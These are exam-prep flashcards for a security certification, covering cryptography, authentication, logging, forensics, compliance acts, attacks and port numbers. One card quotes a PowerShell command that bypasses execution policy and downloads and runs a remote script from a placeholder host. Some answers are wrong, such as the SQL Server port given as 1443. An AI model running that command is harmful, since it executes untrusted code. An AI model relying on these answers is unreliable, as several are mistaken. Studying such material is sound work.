such as a vulnerable operating system or software.

What provides RAID 6?

RAID 6, disk striping with dual parity, uses a minimum of four disks with
distributed parity bits. Can handle up to two disks failing.

What are UVAs?

unmanned aerial vehicles
What function does counter mode perform in a
cryptographic system?
Counter mode (CTR) makes a block cipher into a stream cipher by generating a
keystream block using a nonrepeating sequence to fill in the blocks. This allows
data to be streamed instead of waiting for blocks to be ready to send.

Chris wants to limit who can use an API that his

company provides and be able to log usage of
the API uniquely to each organization that they
provide access to. What solution is most often
used to do this?
API Keys

What key advantage does an elliptical curve

cryptosystem have over an RSA-based
cryptosystem?
It can use a smaller key length for the same resistance to being broken.

What is CASB used for?

A cloud access security broker (CASB) is used to monitor cloud activity and
usage and to enforce security policies on users of cloud services.

Dan knows that his Linux system generates

entropy that is used for multiple functions,
including encryption. Which of the following is
a source of entropy for the Linux kernel?
The Linux kernel uses user-driven events like keystrokes, mouse movement, and
similar events to generate randomness (entropy)
Chris sets up SAN replication for his
organization. What has he done?
Storage area network (SAN) replication copies the contents of one repository to
another repository, such as an organization’s central SAN environment to a
remote SAN at the hardware or block level.

What is the best way to prevent VM escape?

he best way to prevent this is to limit the ability of the host and the VM to share
resources. If possible, they should not share any resources.

AES and DES are an example of what type of

cipher?
Block ciphers that encrypt groups of plain-text symbols all together

What is the primary threat model against static

codes used for multifactor authentication?
Theft

Different types of load balancing

Least connection - Least connection-based load balancing takes load into
consideration and sends the next request to the server with the least number of
active sessions.

Weighted response time - uses health checks to determine which server

responds the most quickly on an ongoing basis and then sends the traffic to that
server

Source IP hashing - uses the source and destination IP addresses to generate a

hash key and then uses that key to track sessions, allowing interrupted sessions
to be reallocated to the same server and thus allowing the sessions to continue

Round robin - simply distributes requests to each server in order

Different standards for authentication
FIDO U2F - open standard provided by the Fast IDentity Online Alliance, is a
standard for security keys

OTP - One time password

OATH - Open Authentiation provides standards both HMAC-based one time

password (HOTP) and TOTP, or time-based one time passwords.

SAML

OpenID

Amanda wants to allow users from other

organizations to log in to her wireless network.
What technology would allow her to do this
using their own home organization’s
credentials?
Radius federation

Ted wants to use IP reputation information to

protect his network and knows that third
parties provide that information. How can he
get this data, and what secure protocol is he
most likely to use to retrieve it?
Many subscription services allow for data retrieval via HTTPS. Ted can subscribe
to one or more threat feeds or reputation services, and then feed that
information to an intrusion detection system (IDS), intrusion prevention system
(IPS), next -generation firewall, or similar network security tool.

What is FDE?
full disk encryption
What is the easiest deployement of VPN?
SSL/TLS VPN

What AH does not provide?

IPSec’s Authentication Header (AH) protocol does not provide data confidentiality
because it secures only the header, not the payload.

What will limit the amount of total bandwidth

that broadcast packets can use?
Storm control

What appliance in cloud act as firewall?

Security groups

John wants to deploy a solution that will

provide content filtering for web applications,
CASB functionality, DLP, and threat protection.
What type of solution can he deploy to provide
these features?
Next-generation secure web gateways

Difference between hardware, software, virtual

and cloud firewalls
A software firewall is best suited to deployments to individual machines,
particularly when endpoint systems are being protected.

Hardware firewalls are typically deployed to protect network segments or groups

of systems, and result in additional expense and management.

Virtual and cloud firewalls are most often deployed in datacenters where virtual
or cloud environments are in use, although a virtual firewall could be run on an
endpoint.

Difference between OS hardening and

Configuration management
OS hardening is the process of securing an operating system by patching,
updating, and configuring the operating system to be secure. Configuration
management is the ongoing process of managing configurations for systems.

Marcus wants to check on the status of carrier

unlocking for all mobile phones owned by and
deployed by his company. What method is the
most effective way to do this?
needs to be checked with the carrier if you want to validate corporate-owned
phones without manually checking each device.

What can contain PFX file?

A Personal Information Exchange (PFX) formatted file is a binary format used to
store server certificates, as well as intermediary certificates, and it can also
contain the server’s private key

What contains P12 file?

A P12 file contains a digital certificate that uses PKCS#12 (Public Key
Cryptography
Standard #12) encryption. The P12 file contains both the private and the public
key,
as well as information about the owner (name, email address, etc.), all being
certified
by a third party.

which wireless method works only via line-of-

sight connection?
Infrared
What is the most common way to harden the
Windows registry?
Disable remote registry access if not required.

What is the primary use of hashing in

databases?
Hashing is commonly used in databases to increase the speed of indexing and
retrieval since it is typically faster to search for a hashed key rather than the
original value stored in a database

Charles is a CISO for an insurance company. He

recently read about an attack wherein an
attacker was able to enumerate all the network
devices in an organization. All this was done by
sending queries using a single protocol. Which
protocol should Charles secure to mitigate this
attack?
SNMP

Samantha has used ssh-keygen to generate

new SSH keys. Which SSH key should she place
on the server she wants to access, and where is
it typically stored on a Linux system?
Samantha should place her public SSH key in the .ssh directory in her home
directory on the remote server. Private keys should never be outside of your
control, and unlike many Linux configurations, SSH keys are not kept in the /etc/
directory.
Charles has been asked to implement DNSSEC
for his organization. Which of the following
does it provide?
Integrity

Which tool allows to retreive meta-data?

Exiftool

Port scanning tools

Netcat
Nmap
Nessus

What key forensic tool relies on correctly set

system clocks to work properly?
Timelining

Waht command is used to trace router on

Windows machine?
Tracert

What phase of the incident response process

often involves adding firewall rules and
patching systems to address the incident?
Recovery
What process is used to help identify critical
systems?
BIA - A business impact analysis (BIA) helps to identify critical systems by
determining which systems will create the largest impact if they are not available

What are data classification labels for

businesses? (6 of them)
Public, private, sensitive, confidential, critical, and proprietary are all commonly
used data classification labels for business.

How is SLE calculated?

It is calculated using the asset value (AV) times the exposure factor (EF), which is
an estimated percentage of the cost that will occur in damage if the loss occurs

What type of malware provides administrative

priviliges for the workstation?
Rootkit

While investigating a malware outbreak on your

company network, you discover something very
odd. There is a file that has the same name as a
Windows system DLL, and it even has the same
API interface, but it handles input very
differently, in a manner to help compromise the
system, and it appears that applications have
been attaching to this file, rather than the real
system DLL. What best describes this?
Shimming
Where are failed authentication logins stored in
Linux?
/var/log/auth.log

What log will journalctl provide access to?

The systemd journal

What is command nestat used for?

netstat is a command-line tool that shows network connections, interface
statistics, and other useful information about a system’s network usage.

What key difference separates

pseudonymization and anonymization?
Pseudonymization can allow reidentification of the data subject if additional data
is available.

You are responsible for setting up new accounts

for your company network. What is the most
important thing to keep in mind when setting
up new accounts?
Least priviliges

What is NSA?
National security agency - provides configuration benchamarks
Elle wants to acquire the live memory (RAM)
from a machine that is currently turned on.
Which of the following tools is best suited to
acquiring the contents of the system’s
memory?
Volatility framework

What U.S. federal agency is in charge of COOP?

FEMA

Maria wants to add entries into the Linux

system log so that they will be sent to her
security information and event management
(SIEM) device when specific scripted events
occur. What Linux tool can she use to do this?
Logger

What is curl used for?

To transfer data over HTTP, HTTPS, FTP, FTPS

Aaron wants to use a multiplatform logging tool

that supports both Windows and Unix/Linux
systems and many log formats. Which of the
following tools should he use to ensure that his
logging environment can accept and process
these logs?
NXLog
Difference between HSM and TPM?
HSMs can act as a cryptographic key manager, including creating, storing, and
securely handling encryption keys and certificates. They can also act as
cryptographic accelerators, helping offload encryption functions like Transport
Layer Security (TLS) encryption.

A TPM (Trusted Platform Module) is a device used to store keys for a system but
does not offload cryptoprocessing, and it is used for keys on a specific system
rather than broader uses.

What can be OAuth used for?

OAuth (Open Authorization) is an open standard for token-based authentication
and authorization on the Internet and allows an end user’s account information
to be used by third-party services, without exposing the user’s password.

What is the most common format for

certificates issued by certificate authorities?
PEM

What is static code analysis?

A static code analyzer can check to see if all memory allocation commands
(malloc, alloc, etc.) have a matching deallocation command.

Who assigns data labels?

Data owner

What right is not part of GDPR?

The right ot anonymity
 Difference between top secret, secret and
confidential
Confidential - identifiable harm to national security.

Top Secret information requires the highest degree of protection and would
cause exceptionally grave harm if exposed without authorization.

Secret information requires a substantial degree of protection and would cause

serious damage if exposed.

Standard for implementing information security

management systems
ISO 27002

You are a security administrator and advise the

web development team to include a CAPTCHA
on the web page where users register for an
account. Which of the following controls is this
referring to?
Deterrent

Mike wants to look for a common set of tools

for security and risk management for his
infrastructure as a service (IaaS) environment.
What organizations provides a vendor-neutral
reference architecture that he can use to
validate his design?
The cloud security alliance

What are NIST RMF's process parts? (7)

National Institute of Standards and Technology (NIST) Risk Management
Framework (RMF)
1. Prepare
2. Categorize system
3. Select controls
4. Implement controls
5. Assess controls
6. Authorize system
7. Monitor controls

Which EAP based protocol is you want to

prioritize reconnection speed and don't want to
deploy client certificates for authentication?
EAP-FAST

Which EAP standard requires mutual

authentication?
EAP-TLS

Miles wants to ensure that his internal DNS

cannot be queried by outside users. What DNS
design pattern uses different internal and
external DNS servers to provide potentially
different DNS responses to users of those
networks?
A split horizon DNS implementation deploys distinct DNS servers for two or more
environments, ensuring that those environments receive DNS information
appropriate to the DNS view that their clients should receive.

What term describes a cloud system that

stores, manages, and allows auditing of API
keys, passwords, and certificates?
secret manager
Michelle wants to check for authentication
failures on a CentOS Linux–based system.
Where should she look for these event logs?
Var/log/secure

What mitigation technique is used to limit the

ability of an attack to continue while keeping
systems and services online?
Containment may focus on keeping systems or services online to ensure that
organizations can continue to function until other options for business continuity
can be implemented.

Troy wants to review metadata about an email

he has received to determine what system or
server the email was sent from. Where can he
find this information?
Email headers contain a significant amount of metadata, including where the
email was sent from

Valerie wants to capture the pagefile from a

Windows system. Where can she find the file
for acquisition?
C:\pagefile.sys

What are network monitoring tools that can

provide bandwidth monitoring information?
PRTG and Cacti
Nathan needs to know how many times an
event occurred and wants to check a log file for
that event. Which of the following grep
commands will tell him how many times the
event happened if each occurrence is logged
independently in the logfile.txt log file, and
uses a unique event ID: event101?
grep -c 'event101' logfile.txt

What location is commonly used for Linux swap

space?
separate partition

Jean’s company is preparing for litigation with

another company that they believe has caused
harm to Jean’s organization. What type of legal
action should Jean’s lawyer take to ensure that
the company preserves files and information
related to the legal case?
legal notice

How do you ensure that copy of the disk when

doing forensic imaging does match?
compare MD5 or SHA-1 hash

What role do digital forensics most often play

in counterintelligence efforts?
Digital forensics techniques are commonly used to analyze attack patterns, tools,
and techniques used by advanced persistent threat (APT) actors for
counterintelligence purposes.
Adam wants to use a tool to edit the contents
of a drive. What tool can be used?
WinHex

What is APT?
Advanced persistent threat

Which cloud service model provides the

consumer with the infrastructure to create
applications and host them?
Platform as a service - PaaS

Claire discovers the following PowerShell

script. What does it do?
powershell.exe -ep Bypass -nop -noexit -c iex
((New ObjectNet.WebClient).
DownloadString('https://example.com/file.psl))

downloads a file into memory

What kerberos uses to issue tickets?

Key distribution center

What type of topology does an ad hoc wireless

network use?
Point to point
What is SoC technology?
system on the chip

Alaina has been told that her organization uses

a SAN certificate in their environment. What
does this tell Alaina about the certificate in use
in her organization?
A SAN, or Subject Alternate Name, certificate allows multiple hostnames to be
protected by the same certificate.

Frank is a security administrator for a large

company. Occasionally, a user needs to access a
specific resource that they don’t have
permission to access. Which access control
methodology would be most helpful in this
situation?
Rule-based access control applies a set of rules to an access request. Based on
the application of the rules, the user may be given access to a specific resource
that they were not explicitly granted permission to.

What browser feature is used to help prevent

successful URL redirection attacks?
Displaying the full real URL

What is prepending?
Adding an expression or phrase to an email, subject line, or headers to either
protect or fool users.

can be used when adding data as part of an attack, and that social engineers
may “prepend” information by inserting it into conversation to get targets to
think about things the attacker wants them to.
What type of attack depends on the attacker
entering JavaScript into a text area that is
intended for users to enter text that will be
viewed by other users?
Cross-site scripting involves entering a script into text areas that other users will
view.

What is called spam on social media?

Spimming

How is risk created? Combination of what?

A risk results from the combination of a threat and a vulnerability

What won't protect from zero-days attacks?

Patching

What is PGP?
Pretty Good Privacy (PGP) is an encryption program that provides cryptographic
privacy and authentication for data communication.

PGP is a public-key cryptosystem and relies on an asymmetric algorithm

Which analysis framework makes no allowance

for an adversary retreat in its analysis?
Lockheed Martin cyber kill chain

What does netcat -l -p do?

-l is listening
-p is listening port
What is FISMA?
The Federal Information Security Management Act (FISMA) is a United States
federal law that defines a comprehensive framework to protect government
information, operations, and assets against natural or human-made threats.

What is HIPPA?
The Health Insurance Portability and Accountability Act (HIPPA) is a United States
federal law designed to provide privacy standards to protect patients' medical
records and other health information provided to health plans, doctors, hospitals,
and other health care providers

What is COPPA?
The Children's Online Privacy Protection Act (COPPA) is a United States federal
law that imposes certain requirements on operators of websites or online
services directed to children under 13 years of age and on operators of other
websites or online services that have actual knowledge that they are collecting
personal information online from a child under 13 years of age.

What is data owner responsible for?

A data owner is responsible for the confidentiality, integrity, availability, and
privacy of information assets. They are usually senior executives and somebody
with authority and responsibility. A data owner is responsible for labeling the
asset and ensuring that it is protected with appropriate controls.

What is data steward responsible for?

The data steward is primarily responsible for data quality. This involves ensuring
data are labeled and identified with appropriate metadata. That data is collected
and stored in a format and with values that comply with applicable laws and
regulations.
What is data custodian?
The data custodian is the role that handles managing the system on which the
data assets are stored. This includes responsibility for enforcing access control,
encryption, and backup/recovery measures.

What is privacy office responsible for?

The privacy officer is responsible for oversight of any PII/SPI/PHI assets managed
by the company.

What is the difference between IdP and RP?

Relying parties (RPs) provide services to members of a federation. An identity
provider (IdP) provides identities, makes assertions about those identities, and
releases information about the identity holders.

What is NAC used for?

Network Access Control (NAC) uses a set of protocols to define and implement a
policy that describes how to secure access to network nodes whenever a device
initially attempts to access the network. NAC can utilize an automatic
remediation process by fixing non-compliant hosts before allowing network
access. Network Access Control can control access to a network with policies,
including pre-admission endpoint security policy checks and post-admission
controls over where users and devices can go on a network and what they can
do.

What can we implement for secure NTP traffic

between Linux systems?
SSH tunneling

What is the best way to secure application on

the web with strong authentication method?
Authenticate the client with a digital certificate
What two connection methods are used for
most geofencing applications?
GPS and WI-FI

What sends unexpected and out of range data

to applications to see how they will respond?
fuzzer

Which network protocol will suffer from failing

NTP?
Kerberos uses various tickets, each with a time limit. The service tickets are
typically only good for 5 minutes or less.

How can we secure peripherals?

turn off remote access (SSH, Telnet)

Which algorithm is used for key stretching?

Bcrypt, Scrypt and PBKDF2

What is the recommendation for geographical

dispersal for data centers?
60-120 miles
Chris is reviewing the rights that staff in his
organization have to data stored in a group of
departmental file shares. He is concerned that
rights management practices have not been
followed and that employees who have been
with the company he works for have not had
their privileges removed after they switched
jobs. What type of issue has Chris encountered?
privilige creep

What type of attack is the U.S. Trusted Foundry

program intended to help prevent?
supply chain attacks

What type of attacks takes advantage of ULR

parameters and cookies to make legitimate
users perform unwanted actions?
Cross-site request forgery

What is port 8080 used for?

web servers

What is XML injection used for?

The injection of unintended XML content and/or structures into an XML message
can alter an application's intended logic, and XML Injection can cause the
insertion of malicious content into resulting messages/documents.

How can you identify XML injection attack?

<>
What is arp-poisoning?
. ARP Poisoning, also known as ARP Spoofing, is a type of cyber attack carried
out over a Local Area Network (LAN) that involves sending malicious ARP packets
to a default gateway on a LAN to change the pairings in its IP to MAC address
table.

What attack technique will reveal version of

SSH running on the web server?
Banner grabbing

What type of cryptographic algorithm is ECC?

asymmetric algorithm

What is used in forencis analysis to prevent

from changing the hard drive contents during
your analysis?
hardware write blocker

Which authentication mechanism does 802.1x

usually rely upon?
EAP

What is the best way to protect cookies?

Setting the secure attribute on the cookie

What port is used by MySQL

3306
What common vulnerability is usually used
against a Windows file server to expose
sensitive files, databases, and passwords?
Missing patches

What can be implemented to reduce the

amount of NetFlow data collected to only
included usefull traffic?
Enable sampling of the data

What is SCCM?
The Microsoft System Center Configuration Manager (SCCM) provides remote
control, patch management, software distribution, operating system deployment,
network access protection, and hardware and software inventory.

What includes data retention policies?

Data retention policies highlight what types of information an organization will
maintain and the length of time they will maintain it.

Data classification would not be covered

Charles wants to display information from his

organization's risk register in an easy-to-
understand and -rank format. What common
tool is used to help management quickly
understand relative rankings of risk?
heat map

What is the role of IKE in IPsec?

Internet key exchange (IKE) is used to set up security associations (SAs) on each
end of the tunnel. The security associations have all the settings (i.e.,
cryptographic
algorithms, hashes) for the tunnel.

What is VDI?
Virtual desktop infrastructure (VDI) - we can manage patches, configurations and
software installation from central location.

Which IPsec mode allows different policies per

port?
IPSec transport mode allows different policies per port

Tom is responsible for VPN connections in his

company. His company uses IPSec for VPNs.
What is the primary purpose of AH in IPSec?
Authentication headers (AHs) provide complete packet integrity, authenticating
the packet and the header.

What is hardening?
Hardening is the process of improving the security of an operating system or
application. One of the primary methods of hardening a trusted OS is to
eliminate unneeded protocols. This is also known as creating a secure baseline
that allows the OS to run safely and securely

XML-based open standard for exchanging

authentication information
Security Assertion Markup Language (SAML) is an XML-based, open standard
format for exchanging authentication and authorization data between parties
Which term is used to measure how is system
or device maintainable?
MTTR

What term is used to describe reliability of hard

drives?
Mean time between failures (MTBF) is a measurement to show how reliable a
hardware component is

Difference between prepending and pretexting?

Pretexting is a type of social engineering that involves using a false motive and
lying to obtain information

Prepending is described by CompTIA as “adding an expression or a phrase,

Chris is notified that one of his staff was

warned via a text message that the FBI is
aware that they have accessed illegal websites.
What type of issue is this?
Hoaxes are fake security threats and can consume both time and resources to
combat.

What is the best way to capture artifacts of

infection process by fileless viruses?
Fileless viruses often take advantage of PowerShell to perform actions once they
have used a vulnerability in a browser or browser plug-in to inject themselves
into system memory.
What is associated with concept of familiarity?
What the attacker will do?
Familiarity is a social engineering technique that relies on assuming a widely
known organization's persona

What is cognitive password attack?

A cognitive password is a form of knowledge-based authentication that requires
a user to answer a question, presumably something they intrinsically know, to
verify their identity. If you post a lot of personal information about yourself
online, this type of password can easily be bypassed.

What can help to identify malware beacons

behavior?
Beacon's peristence
Beaconing interval
The removal of known traffic

What is behavior-based detection?

Activity is evaluated based on the previous behavior of applications, executables,
and the operating system in comparison to the current activity of the system

Difference between behavior-based detection

and anomaly-based detection
Behavioral-based detection records expected patterns concerning the entity
being monitored

Anomaly-based detection prescribes the baseline for expected patterns based on

its own observation of what normal looks like
Which cloud based infrastructure is good for
developing app using their programming
environment?
PaaS

Difference between Retinal scan and Iris scan?

Iris scans rely on the matching of patterns on the surface of the eye using near-
infrared imaging, and so is less intrusive than retinal scanning (the subject can
continue to wear glasses, for instance) and much quicker.

How long are hashing algorithms long in

output?
MD-5, SHA-1, SHA-2, RIPEMD, NTLM
MD-5 - 128 bit
SHA-1 - 160 bit
SHA-2 - 256 bit
RIPEMD - 160 bit
NTLM - 128 bit

Difference between continues delivery and

deployment?
Continuous deployment is a software development method in which app and
platform updates are committed to production rapidly.

Continuous delivery is a software development method in which app and

platform requirements are frequently tested and validated for immediate
availability.

What is the most important feature to consider

when designing a system on a chip?
space and power savings
What is segmentation containtment?
Segmentation-based containment is a means of achieving the isolation of a host
or group of hosts using network technologies and architecture.

What is ECC?
Elliptic curve cryptography

Difference between data purging and wiping?

Data wiping or clearing occurs by using a software tool to overwrite the data on
a hard drive to destroy all electronic data on a hard disk or other media.

Purged device is generally not reusable

Symmetric key algorithms

DES, 3DES, IDEA, AES, Blowfish, Twofish, RC4, RC5, RC6

Assymetric algorithms
Diffie-Hellman, RSA, DSA, PGP and ECC

Which cryptographic algorithm is symmetric

stream cipher?
RC4

What is GLBA?
Gramm-Leach-Bliley Act (GLBA) institutes requirements that help protect the
privacy of an individual's financial information held by financial institutions and
others, such as tax preparation companies.
What is SOX?
Sarbanes-Oxley Act (SOX) dictates requirements for storing and retaining
documents relating to an organization's financial and business operations,
including the type of documents to be stored and their retention periods. It is
relevant for any publicly-traded company with a market value of at least $75
million.

What is FERPA?
The Family Educational Rights and Privacy Act (FERPA) requires that educational
institutions implement security and privacy controls for student educational
records.

What is SPI?
information about an individual's race or ethnic origin is classified as Sensitive
Personal Information (SPI).

Which of the protocol is commonly used to

collect information about CPU utilization and
memory usage from network devices?
SNMP

What is cain and abel?

Cain and Abel is a popular password cracking tool. It can recover many
password types using methods such as network packet sniffing, cracking various
password hashes by using methods such as dictionary attacks, brute force, and
cryptanalysis attacks.

What is a rogue anti-virus?

Rogue anti-virus is a form of malicious software and internet fraud that misleads
users into believing there is a virus on their computer and to pay money for a
fake malware removal tool (that actually introduces malware to the computer).
What kind of technology uses password and
username?
PAP

Your firewall is blocking outbound email traffic

that is attempting to be sent. Which port
should you verify is set to ALLOW in the firewall
to ensure your emails are being sent?
25

What is part of COPE policy?

Cellular data, Remote wipe, Location tracking, and MDM

Which of the access control methods provides

the most detailed and explicit type of access
control over a resource?
Attribute-based access control (ABAC) provides the most detailed and explicit
type of access control over a resource because it is capable of making access
decisions based on a combination of subject and object attributes, as well as
context-sensitive or system-wide attributes. Information such as the group
membership, the OS being used by the user, and even the machine's IP address
could be considered when granting or denying access.

What should be done if vulnerability exists but

cannot be patched?
Identify, implement and document compensating control

What is the biggest disadvantage of using

single sign-on (SSO) for authentication?
It introduces a single point of failure
what should be done first when we are under
attack and don't know which assets have been
affected?
Conduct a data criticality and prioritization analysis

What is smurf attack?

A smurf attack occurs when an attacker sends a ping to a subnet broadcast
address and devices reply to spoofed IP (victim server), using up bandwidth and
processing power.

A Smurf attack involves sending spoofed broadcast packets to the target

network’s router.

Describe hybrid type attack on passwords?

Passwords are from dictionaries - words and some random characters added to it
Combining of dictionary and brute force attack together
Difference between stream cipher and block
cipher?
stream cipher will encrypt one bit at a time
Block cipther will encrypt 8, 16, 32, 64, etc bits at a time

What is FM-200?
Fire extinguishing system

What is BAS?
A building automation system (BAS) for offices and data centers ("smart
buildings") can include physical access control systems, but also heating,
ventilation, and air conditioning (HVAC), fire control, power and lighting, and
elevators and escalators

Which physical access management control tool

relies upon using a certificate-based
authentication mechanism?
Smart cards

What could be managerial control?

Mandatory vacation policies, job rotation policies, and separation of duties
policies are great examples of managerial controls.

penetration testing

What technology is NOT PKI x.509 compliant

and cannot be used in various secure
functions?
Blowfish
What si WAF?
WAF (web application firewall) it can serve as a compensating control and
protect against web application vulnerabilities like an SQL injection until the
application can be fully remediated.

What captive portals rely on?

Captive portals usually rely on 802.1x, and 802.1x uses RADIUS for
authentication.

How can be NAC used for?

Network Access Control (NAC) is an approach to computer security that attempts
to unify endpoint security technology (such as anti-virus, host intrusion
prevention, and vulnerability assessment), user or system authentication, and
network security enforcement. When a remote workstation connects to the
network, NAC will place it into a segmented portion of the network (sandbox),
scan it for malware and validate its security controls, and then based on the
results of those scans, either connect it to the company’s networks or place the
workstation into a separate quarantined portion of the network for further
remediation.

An attacker uses the nslookup interactive mode

to locate information on a Domain Name
Service (DNS). What command should they type
to request the appropriate records for only
name servers?
set type=ns

What is GPO?
Microsoft's Group Policy Object (GPO) is a collection of Group Policy settings that
defines what a system will look like and how it will behave for a defined group of
users. It allows an administrator to create a policy and deploy it across many
devices in the domain or network. P
What program is used for forensic analysis on
imaged drive?
Autopsy

Kunal is building a web application and wants

to allow users to connect the application to
Google services and allow other users to access
and modify files and other materials. What
open standard should he implement to allow
users to delegate access and control of these
resources?
OAuth

What is the difference between BPA and MSA?

A master services agreement (MSA) defines most of the terms of service
between two organizations

BPA is a business partnership agreement, used when two businesses want to

partner together.

Where can you find windows installer

transactions?
windows application log

Madhuri wants to create her X.509 certificate

and store it in the most common format so that
she can easily use it. What format should she
export her certificate in to provide the broadest
compatibility?
PEM
Where to look when you are investigated denial
of service attack, SYN flood?
Output from a protocol analyzer - Wireshark
If it was DDoS attack NetFlow logs would be the place

What is NGSWG?
Next-generation secure web gateways (NGSWGs) combine many web-based
security functions like data loss prevention (DLP), content decryption and
inspection, cloud access security broker (CASB), threat detection, and web
content filtering into a single solution.

What is the key difference between isolation

and containment?
Isolation removes all network connectivity and containment restricts network
connectivity but may not prevent it

Containment actions can include adding firewall or intrusion prevention system

(IPS) rules, preventing outbound traffic to specific sites, or similar actions.

Which of the ISO standards focuses on privacy

as its main objective?
27701

What is the best way to quickly and effectively

check files for compromise?
The best option is to submit them to an open-source intelligence provider like
VirusTotal. VirusTotal allows you to quickly analyze suspicious files and URLs to
detect types of malware
What can be removed after initial vulnerability
scan to avoid wasting time and remove false
positives?
items classified by the system as Low or as for informational purposes only

Which technique would provide the largest

increase in security on a network with ICS,
SCADA, or IoT devices?
user and entity behavior analytics

Which protocol relies on mutual authentication

of the client and the server for its security?
LDAPS

Waht security features should you use with a

workstation or laptop within your organization?
Host based firewall
Network sniffer
Cable lock
CAT5e STP

What will the "bs" option do with dd command?

it will set the block size

What is ISA?
The interconnection security agreement (ISA) governs the relationship between
any federal agency and a third party interconnecting their systems.
Difference between RTO and MTTR?
Mean time to repair (MTTR) is a measure of the time taken to correct a fault to
restore the system to full operation. MTTR is often used to describe the average
time to replace or recover a system or product.

Recovery time objective (RTO) is when an individual IT system may remain

offline following a disaster.

What is DaaS?
Desktop as a Service (DaaS) provides a full virtualized desktop environment from
within a cloud-based service. This is also known as VDI (Virtualized Desktop
Infrastructure) and is coming in large enterprise businesses focused on
increasing their security and minimizing their operational expenses.

What measures MTTR?

Measures the average time it takes to repair a network device when it breaks

What port is used by RDP?

3389

What port is used by MySQL?

3306

What is the difference between ABAC and MAC?

MAC provides the strongest levle of protection when it comes to access control

ABAC provides the most detailed explicit type of access control over a resource
What can be used if client supports WPA with
pre-shared keys and back end has radius?
802.1x using EAP with MSCHAPv2

What security features should be used in the

data center?
FM-200, Biometric locks, Mantrap, Antivirus

What is raid 0 striping used for?

Provides data striping across multiple disks to increase performance

What is raid 1 mirroring used for?

Provides redundancy by mirroring the data identically on two hard disks

syslog port
514

LDAP with SSL port

636

iCSI
TCP 860
Link data storage facilities over IP

FTPS port
989 990
port for IMAP with SSL
993

POP3 with SSL port

995

Microsoft SQL server port

1443

L2TP port
1701

PPTP port
1723

FCIP port?
Fiber channel over IP
3225

iSCI (targeted) port

3260

port for RDP

3389
diameter port
3868

syslong over TLS port

6514

FTP port
20 21

SCP port
22

SFTP port
22

TFTP port
69

port for keberos

88

port for NNTP

119
port for RPC/DCOM-scm
135

port for LDAP

389

port for SMB

server message block
445

port for SMTP with SSL

465 or 587

port for LDAP with SSL

636

port for iSCSI

860

port for FTPS

989 990

MySQL port
3306